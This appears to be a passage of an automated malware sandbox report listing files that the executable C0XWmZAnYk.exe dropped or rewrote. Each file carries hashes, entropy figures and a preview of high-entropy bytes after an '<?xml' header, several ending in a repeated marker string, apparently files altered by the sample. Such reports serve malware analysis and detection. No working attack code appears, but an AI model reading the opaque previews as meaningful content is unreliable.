              Preview:<?xml...11..........."..a'.o....^R.y....`...o....=.1..XYu.!:...H........\.LTo....2k...Y.......7'^]6=Xl..p..p{.e...n31..Y$.S.......V...x...e%.*?R.Y..v.......4[........#.Fj..-.6.4..,.&..J.o...AL.K}@....t......A..g...,.t].........xc.J#V..H............Z(.-.|\..li.G...}......1.3.L....f.....|^./..N.Y...t...M%...d..+.'l.4.EVR.?.2[.e.7.of.\U.c*]...j..e>.V..P.S.'?....G.S!.]....H.az.c..n..C.....=...L...ZCz.R.J5!....A...%..WQ.......4N.Yy2...PO..........?..d...20\..FSw..S.c."...t..."..V.!>X..T1...-a..U...a..T....`..s\..6......vt.p...f.....Y.|.......Q&..Kq.aVR.sd.B.b...)...f%..l.!...cS.{&[.!.',..d2m..~.i.s.......Ru...FSHU..I..X.L..N.Y'.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1044
              Entropy (8bit):7.802660579697013
              Encrypted:false
              SSDEEP:24:6VgeLbLkseIU9W4oWN0SKGvVEVj+ufH9hPdaf9kJCId+bD:69X4seN9DoWN0SVvVfa/dafmJx8D
              MD5:2FDB06EF0CF6E1ABCD3527F1AF8415C8
              SHA1:F4D297CBF00D9F2551F552F20033F26D0CB2885E
              SHA-256:7408DA5258B72BEA63CD30E368CB9DE5DDF2BCBDC4B182E6C793BC2306BE104C
              SHA-512:B9D0E08859F2C81F1B6FDDDA438ADD2CE5D09F1B1A74430B7DCEFD43CB3ED05E00082D4530522E2960A59F6F5B484D9BD1442801EC089B5F5822F1E29BEC98B2
              Malicious:false
              Preview:<?xml...rr.........s....uu...e@^.>..^......Y.....?tD,...W...Al......,.x@.U.c?(.0',....n..(..Y.p.w.T.....Y.&...0._..#x.[B..P1G..j..@....{.2.j../]..}e{^f...j.._.v.@.I.....M.^.e....|...i..B.*.@A6-.._...`t..|.:u.....z..5...-...$.0b...B..<..T.R.8F;KKtS.x.l.w.]...`pkK@....8.iY.....~.gp~{.xL..X.p2.C..e ...X.I<....Jx.'.=.Zz"..lt...u.d..U.8.msq.L.RLx.P{+..O..i+TO.p...jq.zd..\....9..*J...CD.j.....uJ.V............3'.)..o:_%.y..2rF&.@..6....V...(Br.T..c..z.#,$.vQf.....f..g.f{h]..N......Kub$a..e.p.#... ..t..FS.I5...X..S...l....G..m....;..5~.....*.<.u ;...-..A....[C...vNP........L.. ..du..^N.;.D.E[0..C..r..?..o..P..=..M..,............._E.>..A..t...O...Q..ly{s.u..(....&.+#02nAAD.5.h..|.i..L...^.?-......(..U....D#.o....F.c...uo..3.pj..H.ASkf$.!..n.x..J.YMl.t...KZ...r.8.UP.......<j.toC...4?X.,S.y.J...:E*.......g.r....-;.4:i[.<..;.I:..IY...M.....8.....:RO.0d.6....Z.....a.Z.../.....=..*..ES.,......q%..\....Q..HR.t.c.Q......s.hgigF2ELYocnMQz77LhEpSoXvtYp2junk9H
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):862
              Entropy (8bit):7.792687847005064
              Encrypted:false
              SSDEEP:24:EH5/Chz8f6EDeSIJLeXGkpTCG11OM91d+bD:aaV8f6EDeSWcT960v8D
              MD5:6F212061551C763F0B5705C913D328EA
              SHA1:4C0839525D115BF31453C51B28F4CB822FB6816F
              SHA-256:9AF2DC764087B341EDA9F3503DFA63A2F99AEBE2E4861C4B511AA8119BEC9C3B
              SHA-512:E63A13050A76A69AA1235DD4533AE6C72FB4487B535AB07D9917062673B6961F0BD82BE843FC58E98E972C4A4E0D7B42DA67003398D38B03142BF4A8D0C70388
              Malicious:false
              Preview:<?xml.2....Y%]...3"...".(..'Y..\....2....Gq....(<o.....Y...B..;.#\.o|}.....e.i.|....s....U..].do2fm...._..(.-...........$..+.u.YZ...[..%....^..e...P./...$..XQ.)...z...........g.......o...C0~......%.........i.:.g..X.Y...M.lE...I{$k.i....1.3M.=..............$..6w.RA..%....*........9.#..4......;e.......5...2.%.d..8.,x.V.hQ.%@.p.v.J^K...B..#.Wb.....l....8.!X,.?...(...`........5.....w.....kQS.I...8tMkcS@.J.Px..l..v..:.i..*......?.n.tXx.....P..ZRz|26l.kh.C..r. .Z..P..`2.....-T.=..0..>./.......vzzzr..........>".3.x...(........<.OVS.......2./a.75.v.y.?%t.s....-...P....J,....qE&..... f....hb.-.+E...4r.F....F."Y'.=<....>....Y....b.S..:.neu.........e.{9..W.x.#..L.d...j.]B.....i..AS...z.>..Nr~.w.....E.....Mn..o...NF...}_K.g.ZQ.P6...2../.U..8gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1376
              Entropy (8bit):7.862001494254951
              Encrypted:false
              SSDEEP:24:RVgx2LLUn+Zyio3wLBTjTnKaciUluNrOq2ti8LHNDFNG7WUd+bD:REAL3yiOwlPTKXZluNaq2g8ZUWK8D
              MD5:BF634027A256ED6616868DA9629BD7F3
              SHA1:3FD07806AD2CC83123A5FAB2417EB2424D24A291
              SHA-256:91917A268E049115864E1F8C4CAE581A65E7B990C0F8189063D2F97C9D9CECF4
              SHA-512:B421C4E61F9B77CCCCD3B900E2EBA977E73AA98C56BAD20353DC5503460F146415A42FA96FB12057C20EA9FD3B56F97CB89BAEFBEB224BFE611F5F89D8C94D12
              Malicious:false
              Preview:<?xml...@...J..HT...d.5..#~..[.....V.A...I...!xW5...1.7.tv.........f6W.!......6Z...h.....U.......{....<......n.(..j.Vh..v.....s.d=_af3.0vB..@o..].z....\..mH.}..}.||x....Lq.... V...b..#.Rv..n....cl..<5....b<......}....W..lQf.E'..4H1.......rq.a7a.hN.....?.!(~.*...n..$.Z.|...J.U..<N.....>X".l...PI...dR..._~....f..Q.0p,...3.7,6.....7..qM.rqW....&......^y..%.......dN.d.........4=.F.h*.`?.y...>..vg.5..k.|...=o`.X...v...v0t=....L.d...O%.Tf..x.."..M......G*.K....X:...*F....X.J..\yn)..c.a...k.e.O.G.=T*>..Oz....;....G3..!..W ....o...j.......b{..7>...if...>xd.r..3.e...O....U.".......,..H....QI....I...&.[u;*. R..<Wr.-..w.U..Hs.N.|A.G...>..Kh~.=/.BT..9..`t.,R...$....6.....l.&.D.d1..]. .....J.YVwu......$.g.+.,&.....vM.y....t.WI.e_...z.}])........^...T.y..o:..U...Z.H.<0.gh.c..`Q...X.P(K=.F3.+q..F.-=.X..(z.Y.|.m.93......v.9P.......x.....H.3W.R.q...St..=N...y1..M.....m.l....-g.\V.g{.C......P......4c.3.}<.wj..R...GIwO.GH.P/........h.F.m....XK.i..8..+w.zBO.r_
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2037
              Entropy (8bit):7.897977264584877
              Encrypted:false
              SSDEEP:48:Bw2N6FoTevnlssteENAZ7nvgih0v0fJVAnOHn6ahUH6boL49J5t8D:BffTe215vgeM0RBn/oU9JI
              MD5:4936BFB916C826EF66EB8ECB4379B170
              SHA1:FA8355E31DC6B099D91924C4ADDD5F5D72769B0E
              SHA-256:EECD089B2F8E9407AC5A2BCD653B13C5707B38B95AC44CBE37C0E51CE2276A76
              SHA-512:FE8C2779C37994F140269C84041BDDE9FC310817F0F0F75BFD7F19E6A0EBC81C951BEB66D0BFBA581A2D12F61E7BB56263CE6744B4A310513D7F31606A4FC67A
              Malicious:false
              Preview:<?xml^.... ....0...6.............7...h.=g}...d....-...P....Bt.\.>...C.:..4..|.}.>.P.Xs..&.......b1CPz.BMF.:8)..c{?N.. ..a.uO...a.ptY......(0..J....&....Mb..b}......<...lFL.~.1.V...0...3.>.z...2....h#.QOI..8......t...._..7.t...Eyto..OL...E..iK...o.2........["Y.o..6..Lq.....5U`Z.......t.w.Q.j>s.].....w(.....c(L.Z{n7?..e..p...?...hp.7...X9..n..f..:.5.z..E;..byT...... 7..w)...E.64c..]...\.o.c.....?f\!4.J.*.Z...m.Y..~G.Fy......3.6I.C..#[.....h..2..a*...A.0....F..S.:...5H...&f......y.?...f.J.....<]....v....U#..0e.3A.. ...B...R....&....W("<9...9.............+...9.]b.....z...ds.]...m.cII..!1+H..:.Q.N.sUs.>7.....r.<.*....../*...9..+.....v/..-...,...B.nU.^M.iu....~3...2....L=c.C...w.e.c..oac.+.1@..l.....b.Ombe..\..q....;L..Q..].~......O..Yb..E.)..+l...=...'....H....[..h_.8..{.....]Y...v..H&?R.R.(.J..y!.pq.TT.....rm.c.k..cR.,..p]....:z.............5n.... ..B#..0.<..........#iXq.6.l.Pl..6.#..T...@./.-_.S..Pn...K......Rq.%.pO.-...."l`...........)
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2074
              Entropy (8bit):7.91361257172119
              Encrypted:false
              SSDEEP:48:rkZdW7Fmlq9wjUwbWmLibL863vbtKu4WUqRbc/AszsPrcF8D:udUcVjRbdLiM+btKMg/As+rcq
              MD5:12BB7D4613F8CA2180DFBBB2307727E9
              SHA1:B71849686F56E2750C64C6FFB45B81C922F74926
              SHA-256:B16785F4AA0F7C76CD19E741D7668B7EBF68E0659D0ED4F7E9077E3BC8A224BB
              SHA-512:FCED6693F03D83D983E545389A6A7C0B98156676AE3D9092B87B2B60124B650B3738ACF69CAEE339A5C65E1CA58F0034558B43C52490F2D34FC16118EDAC8493
              Malicious:false
              Preview:<?xml..|.J|T...g...........Nj......B..p(..:.X..e[..s.?...m..W.(.9.....b.[.a...0.m....;lBj...?s.........M...-.1...........c.p@..F...D..\s&..s.[.....o..d...|.&.K...nKse.Ay.D.T~.q..~ .......+....c.n.hRQ.LJiv6.W5YX....X..'sW.=..Z...d.u..-.!..lO......Nv..<........$.{...j$y ......VP5._...u4;l.....j.A.i...uw^IC....(......."..J..qu........GL...@....k..\?.f ...i...R2...6].\......bh.,.....)..i....s5mr..c f.=.@.S..d.dQD....0.W......J.y:...o.+GJ.5....=!...4...0%R....=...~.F.`I.M.y4...2j7N..I.A...SH.M...$'...K).0a.U.W6..t..f...=......u......g..<.B .....t...T..*<.#.Q.U./....*..Q..(...=...C.B......N(`K&.C1.......w.wC...FK@........3.Y|..\.n.......{..u...&J.kM....;..k)n..9...;$d..w....Uv..g...e.....3....\;a,..4.[......9Gd.O..f_...d.....-...7.q.....f..8......I..5..Q.i...Za..K...*8....B}.......q.....,..@+.....F.@.B.2............4Mp.."9.yU..H...Xt..M0....c..$8......t.2I'."...2..4.a..E|M...!.,KL.......^W`f.J...|B.7b... .[.#..F..*.Q......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):878
              Entropy (8bit):7.773723185865311
              Encrypted:false
              SSDEEP:24:YH+oy6AKa8StWhRGtsNkIpIE5habIakLsRbhibp2XoHwQxeCILd+bD:C+D6AKESjIEXUIafh+XzIR8D
              MD5:0A29463DB7E503C76619F5FEC6E690A5
              SHA1:61D885CC9EEE2F56575D2EAE364BA07D132EA94E
              SHA-256:C202C102D5989826EF95356D0C07F9153EDB8F22924013327A1DE56CEB9673BB
              SHA-512:F51FB6549FF5AC43C1F5CE33DE202EB33743F3D69662BC44ABD25D43AFA3EE23FA3F1C17A09F8BE4BFF532AF7272F37656B45E9F9CDDD4B2C525F01C6E62524E
              Malicious:false
              Preview:<?xmldS.`....}7.)C../L6...e...."....Bm...-...{.11..P+k..#.....)......-.t...Db.!.S...vDT.....,j.nT.?....CD...q<D...E..4M#.......g..!.._..f.+.0t<.p..P.......Q.V5,.$..+.,d...g.Z..2..J....pXed.w}..Y.'....cC......l......k.......n.s..qn:.Us........^P.h.x._M.>5 ....CF.....(..Cc..$...<..X..$.7...;xUq...],...!.e1.d3.i4.[..qX.....Q.q=...T[s46...H......<<..C;U...H....G...%......\i..T2.....Q...u.i..a.......^..p...=...`............`...9[?E)..eq....]..y.4...7sJ....*..s.J..e.~.k.v....I.hg7.le...1m.....:..GN..i;!..6......T..~.. t.....Rq;........|H}\f&......|.8.x..j...f.l....9.u./.(..%.......m..xz........dj.x...e3...S.Q.v]..b......P".3...O..?..j.:.D......P.bx.S...c.....T.!..g.>.f_y%m....t...IQ..c..A../....AG...l.].X"...g..VA..Jy_...(....n..3...C.[...)..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.67860224924569
              Encrypted:false
              SSDEEP:12:8OYGpnIeXgzS+fnx/zBTXAaShKTnLlyCR9qcaABjOc9clvqG/NAfdMMZ54dxa3cq:NY8w2CLT60ThnREKBjOcx0AFM454d+bD
              MD5:0C0E494B4E5431D445A4701CAFD5C242
              SHA1:4161BCA347A0E51C54211FD275D9A08EC34DEDFD
              SHA-256:1BB7CEC83C3E1DECDAC663F55880DECF52A2471CA61E1BBACD377EF5A277F723
              SHA-512:917AB3578A44C949923892313CF7432F90BE0E8C6E4F00C33415E910CBD8904A81D5086B11685A24DA16ECA11C5F5C6A43D79B7EA569134E0ED52452AA339CA8
              Malicious:false
              Preview:<?xml(... ....._..AMHKf......d..6..:...?.>...^,.../....v....`.....5.L...S.Q.K\.M.4.i..W.F.X.\."[.-.`..G...!+F=.\.....lF..z.%K....-.2#.n"..A..8{.`ih^5".9.fQ...O.p..q9....S..x]zm[9.T......7..m..X~>..dQ.<...i..'6v.Y...NL..[R......B>I...".......9t...lw>?y..N!..J.l.P4M."r.O`..A...i.h0..s..fl....LP3-f.`..9Ew..)n....`pT%..6..w......3....j`*.jY..........(....7.w9...0.qM........!D.+ek..B.y.0V{.Qd.....M.{A..N<z[...)"5..t..~}..T.hE..x?...S.........Vc.gz....V...WD.2.......G..?...p..P.&.....8..7....ex..QV^..c.o..Ut.9s"...+.w..;q.7.....O.S/Y..bPN..{g..h........5.....:.,.kx..w..P5.\ d..oH.4#mtN-..(....D.x".Y..]...i..~..>.........TngigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1685
              Entropy (8bit):7.88061724140485
              Encrypted:false
              SSDEEP:48:UP1LnMyOahQK7b63u2XgwUT2Ga0TPsTniB8D:yMyOYh28KGcTnie
              MD5:42BB1F98DD5885E92A25A56D6D933E90
              SHA1:059F337924CC06DEF2AEBC1A95D8F869021541B9
              SHA-256:8F32DEEC57FE9620F89DB2AC4C0CFAB1139238B1FB332A2D1DD3ADE6D4911965
              SHA-512:7DFF66E4296A11580A6D0ACFA268DF86E96EC6C78A68687029CACF3741CE1AB9BCE3C4BC6BD0C60F859448E970B2BF5E4E3DB481EDABA1F5229CA329F64B7790
              Malicious:false
              Preview:<?xml:A....n...oR..x11..2.P.c....o.u..y.....ho.j.?7.N...6}z......A..?>8...Q.pN.+O..g.|....J@."v.R+D.B....g,-.s..4.....0..\cw..2I..L....Ou.......Qs..?..Q..v!m.j...lS.^....w...tw..n...l..6.fj.@CD...@......._...C,6U....C....$..(.Z.eE...;&..9_...B....XL$*fS.`8.me.1(b:..W...B_..h...c....kO...;.6..H.p....1[.....{)5+.f.%.^.......x...^..E..^..m..J......'C...'.<.6.{.b4.6].T.x...Gz.G.h..M...[.L..;~z...9{..Q..y.6.u...I~h[..N......Eu..{...3#........]...S...x...}.......R....#.dl.[M.~.dU*.$i...}#.)=.._..6dC...p|.d.m..\...\.).\....;..kl.A......#.(.]W)M..T//\......Y{3.D.H..2bBN]!.,=.7T..!..X...y..5...@%.l...1...Q.(T=BPH"S0#...q'.....A.jN......\ib.I..../.}.....iN..O._.?...eR.n.zhZ$.S.......Sf.i.;....e..,......o]...dhN...Q.O;...3...x.\!}\a..B..:.:.Q.UbT8'.........w....4..=....08..[.....<.....!.=k5...5.....)*lZ......g...P.Q..,...~......Gfj.:..@...I.a.Qo!;.T8.y&.?...z#.=.m....#.}..?.....u9..8...l.].hg......f3...Y]..._.|...^@.......... @E>+.nY?3.j..T.I.. !O,F.,g..p.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1722
              Entropy (8bit):7.897471618854242
              Encrypted:false
              SSDEEP:48:UyF43keJtlHWPtwRCQ5ks/ryVXHBlldV0X9z8B8D:Uv3k4tNiuRV5jEhllYP
              MD5:1ECB96D1D2E298BF671927B78DA3011C
              SHA1:22ADECA9E02379E89F4EEA878B111F875589771A
              SHA-256:1E71C5893FDFC47F30DBDF1F1EDDEDB05EB4315D37EF8773D53900153AD6AB30
              SHA-512:BFC33C0972682999A48C428748FCDC8B1714F42A8061BC3CBB5CAC53158007679C2D9F2599D2054335F943C155A96A68C9FA55048D1F89BDA42FD0DEBFE7E4DC
              Malicious:false
              Preview:<?xml5.B^+4...h.1...S.)...,.....*.mL...Rv.[.x.sBP4.<P..K..s.s...F.:..@L.M...;8..}.....Q.~Zr..0.1.....b7..#f..y.;..MS..Q6Y..:..1."......".g...#h.8..Jo..+..np...(..j.i.e.....8.....;...TN....A...D.EE..n.'o...w..Q]DGSR..L...RC.~..F........C..+.X.%..n|sc.%<.W.+...i.o>......6.....I]...d)...D....v..T.i!...t..A.Y.........0..w.#.E6..2....+.........M*...0._..$x...1.9..~C..\...M...kE5.&.M..;<{].sj.u..D3WD.6(.._.....[..Rs....Q.9...`K...!.b.oU7..e.|.^..l.;PB.J.. _.+fQ.z.Z.R.....h.e%K.(\........).nD[.MYE..Q....D....5.T.T.vD!6...HJ.}.}[]..I.;..-pb....6c..@4...K,.....|f%i...EQ....1...XL...X....`.....y.]m......7].fN.r..J...!H1.UQ.:....M.^v.3.=..d+....*..C.....i.......myL.....U..........J.....A..&y.y..y.c...i..tF..#wK.....J)...3..@&..F.L.P`.....g.Tw.6..q..K..Eu.B..o[.p....+..("...g......h.N...ju.p...".l.9Wg....$.Z..fV....|...8?.5.S...:t.tum.~]J._.........Be.jN..48.bb89.Y.e....2P..}. .+...j...../.N../.cH...v..Ae/..RR.....9....:.m..(.......n.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):764
              Entropy (8bit):7.65740470619122
              Encrypted:false
              SSDEEP:12:8xVvfYCKUGEZvbcOhxOHoU+HbEF56K0VIntpmPHIymurzLt6vv765oY54AbYNId4:+IcGE9cqHQFTpmvI5urF6vvU5zbYNId4
              MD5:F86C5D69EE15AE857A90672615EF0933
              SHA1:06E90266626163A454195B53EE0D3884C0686DFB
              SHA-256:F34171BCBD78B7DF1A8C20AEFA1948B1D5DA7C335075A8578386F99616C6F5DE
              SHA-512:EDD278BC83B96990F9CB402523FA856F3D9F3E7C32AA5066622AB4DF1DC9189452AC7880CF1AC046F80BC4FAE152B08CB2A7770CBEF3F7C2E4922B08FB27E8ED
              Malicious:false
              Preview:<?xml.e...h....\K......IE.M..y.#..6-..@N.98.S6$76kH...k...k.4......M..L....".1..6.......l......A..E.a...A.J...D.m.{.?%&.!.s.w@;<.N//*Jm.`o..X..`9.?f.;..\.h.P..^...,....S...g6.IqL..7.,...c.U....:.1...e.+d.Ky..V........=n.."/...*...D.-{.2.r*..yK....K..`.vK..".J..y.S...+....W...E...T.!'Y..6"...V.3.....r...A_.QsL.b7..]..z..d....`k...C..n.X.t..1.k..+.2...|J.U...e....*.0......4).....# ..%...8,E.L..o.r"..'.c-..|.....V.....6HlA...|._...4h.<......a.....E.q.2..>...r.<D......C"...Ty.........3E.!...rnt.4C.D..L.g.,...X..+.}..}%.../,.....0.9-J.}/.....OQ.........K......@._.....")..*.1.....Zt.....+!..uB.._uA...*8C.lm..\. ..-....Ls......B;.,,....V...8D..Oh@.H=..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.895455339740553
              Encrypted:false
              SSDEEP:24:wlqpYEd2JAWFYvCdSy1y07pnkGGQODNLB69V9FEn1iYqqDMOJEgI6SBPt2/Kd+bD:wcpZd69zy0tpYqRFEn1DDMOzI/Bv8D
              MD5:6436EF2D09AE694EC76245CD65FE99FB
              SHA1:B1241F191CEE893AADE578F0769C4A3530FDAE7F
              SHA-256:92283763C6F362D84960FF9E898FE7AB22075F3B240C2E732771EEA5B00947EB
              SHA-512:77E70B6E640CAB192FC525EB78C110F7E1E9A93ABB191CAF98A870AFD6ACFCDD9C14F43A6E3955DE7ECB2C8B6FBA916913441788AADA1A2B11DB99BF0ACD4985
              Malicious:false
              Preview:<?xmlM .'..{..v...YTC...8<.^[.../.U...Twu....Y.R.;j...x...7..t.V................9...].c..d&_ ...H..+>g\|..NT.m.c.....k..96).'.AZ....;#.....R.x...:.cz.)y.5{.t)...Yv.?........=...p@,C.......s!92}......6.F".....w.Q....h.~N.~~..a......c.\.q..@...0.)...,..D..t.....H(..0...DT.....Oj...^!./.....,..*...zd..].......<.*....s..eX..&..(..Wt6..#...a...,o1...P..B.O..;..3....J..$Js[E...s...w.K.^.4.0$.oN..$A.l.$A.i......Q6=........+..K&...8.#vx..+;.\?.B)....u.'1.......}C.....v....X1>aF....M..x._...3.I9j5.....7MKr.n...,.D.......E.[......k./.laX..........oV.....q-u~.x!..c..sCj..L1q.......{:....|7..C...*....I6..h...q.tL..q.@?.|....4<.Z.....WFx.%.E9~..>1Q..8..fA...T.`.1i.G....L..N.q...f+...x.FV..(.k.z..b_..,...........).:..&.d...v..fNb-R.AO.....O....Z....E.G..&8.A..R...Yp4c.8(.L.b>E..0..>.~...M..Dxe.5}..C.*..N..W.Q.*f(....z.w.FiO&\...R.D...O.......r...~.s.%.B.7.........k.....~b._.-....szY$.G.B...U..6.z...?...L.bR..(N.}an3.....jsc|.....Vj..S!
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.89223088226797
              Encrypted:false
              SSDEEP:48:GgW5Y40RZGBB3D2iD9eehV15cvkHyzv3/cXrN08D:GX0RkBBqi9eMV15cvzIXrb
              MD5:F3395F2C5EF77ED1DBFB34BC50983C83
              SHA1:076B9B9934D09D9ABCC6713BF7F0F6A9E873FEC7
              SHA-256:C55CA2699FEB6862EB34B8EFE7EBA0E8C310106BD98188ABC935DFEC0E4D4033
              SHA-512:7A30AD61B3083FE4C4D6218754D8FB6863FF1D86C07BCEB3651F08FBB6982656548CBFD4D91D03488E9B6524E81EF9CAB32E0F00C44597A3C5298050DECFF7EA
              Malicious:false
              Preview:<?xml.,0........j...6...^.E....l.u..u...(*jo........{.<.~.,2.'....Uz..$D(.C1......3.P............$..".z\.8.P.5.?.....>Y.".....[.R>.'...%;=mLtOxg..9.-G...r7(E.6.e......cgV9.v..n.SWX..gJ...e.Y 8GJ......&.O.s..#.....l.....2..:.U.h.[.N.;.,"...=..w.?.!..W..qPB..............U.B...P..e..N.k.......m.K.#...G/....b...|.M...;.%.1+v..N>...t..hCYA.&f...>8l....e.q.Ie8.( exqLWM........9....B.....,lo..E..s......0....4......8.z..*......xS..S.|.y.D#!~p.?=.............U.w....!O.c.p~...\.n..l."h....t.....EMa..6....C..K...c..J^.Z..........Q/m..8..pzs...0.=o......P...&."...d.r....d......*.<lpW..}..J2...Q.|G.Z......1F.u}6..R.W.1....1C.PZ....;71.0.....|.h.....t.m.0....y..[V.....>\.Hh.. .?.V.......]..A.o.p.....2...N;O%tp..<T....9.........`n.....Z.......<K..b...#|...o.R.[{.$M.7t.[..jv(..V...Z..\...`V$...C{...j?..D*%.W^.2IUM]...m!!...%hg.j.#,A...,&..'..B.~..iQXF?I.G.....tNsHuD......%...W{.J..@..K.z......h.};.:.Q@..7......&J\.x.8.....t.s.C..W....W.............{.........
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.89464599413099
              Encrypted:false
              SSDEEP:48:+nucsQDJ3lX+kK2R8OhIwNqgleEsmT3FkJMjeOdCa8D:ouFQDhlX+k586IwNDEZa+JQPi
              MD5:8B16419CB46E10304926741E03191C7D
              SHA1:EB70AD3C04D71016086D49F4D644C86D9A7B65F1
              SHA-256:518E00B325CC6EF6E420D7855753697766FD9D885BF503519692DDB89C87F10D
              SHA-512:0734A8ABDC3CBCEE2F6BC9BDDB3FBB2F0C6B67AE7D0C3392D8D00468E2B80ADBFD6A11772195FAED9D037411A731F137263DBA0E8A3A0905DEA194814FC5D8D5
              Malicious:false
              Preview:<?xml...;.!O..d.....N.J..B(.,..)...Z\..6.....q.t-~..u.D..*..'..E.b|........T.|.k......5.e.z.&.nr..y.Z..)........U.'id..-..u...g.r.......&8y]..A..|.....*..TB.O.."S...B.~.&...QP.LP..v.*..].u.T..=.Wr.\.P....e...L...."..>...8..S....1..U..ay^...g...e..<........<...*...HoV.hx..."&.u..q.i.7j..$p.>C.=.B...&YX....(.;Ki..Z...+=sC....}.5..V.br..t...GGX..."..K.N.8..>..%9#.#..`.G.*.a.D/.:..%.W8.G..Fu...9.l../........n.0...*8...3.>...y#U.+........O.....uFej..e..E.?]k.k....w..@........xAv.)V...\`hl-..+..u...._...u).*$..Q.L...<..."..d..N.Y./.......IK.0.,..S/.F..fd._o..t..9.._.X..Y.....'4.e.).2D...a........3.a.v[....k.d....[.M.Fn.Nz.%.Fl\.-.d..O.....V...Js....&q..o.?.B;..rhB..Js..=...Nca...f...@.g-.6:...Nk?..j....7...=,.............j.\.?.....F......9...Z|.Q.;NYc....&.\c......d..5.....m.#f@W^._(,5n.S.,'...}.[O...|a.'.2..[....S......^<...2.~.......?.D.X..c........;!.S.3.....K.&'.......R.t...LF..'M,..`...=.XP.g%g..6.H.v..>.YT..wg<....A...n._..b.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.899189188601124
              Encrypted:false
              SSDEEP:48:aH5WgO5fIGaM2bDroXrFlNqd8Fg0kuk8D:aH8gL3r6rXiD0H
              MD5:B1925CE73FB141B4541099BB471F408A
              SHA1:4A80A95461D6DBF94DD6EDF36427973962017898
              SHA-256:3D78FFB85CF0F47CAAD9BC1084150B95D971E792122058434F2E479ED0F8FF72
              SHA-512:16D81241ECEA8EF29678CC4C4B99253F99A43BA61E255FF1F96F5DB14DFE58C326B33527167119D76976FA01CDA17746679AF847799BCE7C8D22B1D67A705498
              Malicious:false
              Preview:<?xml.K.$..B..9_m.=.u..,7P...si.&.:...z...SQ#ry"l.7.....c2..A.n.d.n".....s.].y..+av.mY.%W.../........qv...+....CR4].!}.u......`...>.)E]_j.s..O.........nS9A....^....J.$z..f.-...\.l.{.....n.)...../...A.T.kE(.C.n%.P......!..... .p..B.w1..w.S.M6.6c...V%%..q.V...U...R..@...4...7....U...!.{.@!..J...k..^$..5/.E....L.....'t|.z.xzXw..61............|< -E.A.......X.XY..T.|.ppy...U7..n.J...jY|.E...........I...."H.F...6..xU....H........RN.DB.@.Hd..K^...u.K9L.!`bS..n..z....s.C\6.n..([.2p#.Z...a_o.&%E..N....L..w.]..:...1.......7f..!..T..;6....)4h.QWR...._...p.=!.b...J.mx...s..to..##I.7.n..4.. J+..6B......c..c.".u...L. .>z.A&..2.r.....y..zT..f.....9F....,\UE|..N..E.X.Q8..:[....Ag..[..Lc.c[.Z.....s `$Z2h.%..l.}.K...a.8...{.d.AChX..XB6m..}.E.zq.H.]),...R.SF..h.j..m3.M.....7...`x@1+........=w....vre1/"....ONnU....m.L.^18&..k4@....{..=br.o.?.H.:..FW..5.L..H..t..Q[..&.(.v}f..Y...M...h#..*......r....#.B...h......4......B....^...d.1..5)..X.l.x.P..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.893359149771731
              Encrypted:false
              SSDEEP:48:XGDKNBb/imNAdaoEWWmuxb8pkXp4pv8FdnyaX+3jRk8D:WKBbqmNAco3AB8pkXpKv8FdlXQ5
              MD5:36E993612CC956B90CA7567B48E67C31
              SHA1:357722D54EE426E49EC78DBAB4B71836A8AF2E32
              SHA-256:0342D56A227875CE79266C364F5953B5C4C9BABBBEEC737CA4F37FB317BD5C2A
              SHA-512:F76AE85DB0AA4ABD1D31320F866230625B1C7DEEB2E900AD53868BDADF9B85009C481D88CF6C216BC91F805C97466B1212661F8401EB954E26525A65F7A64CE7
              Malicious:false
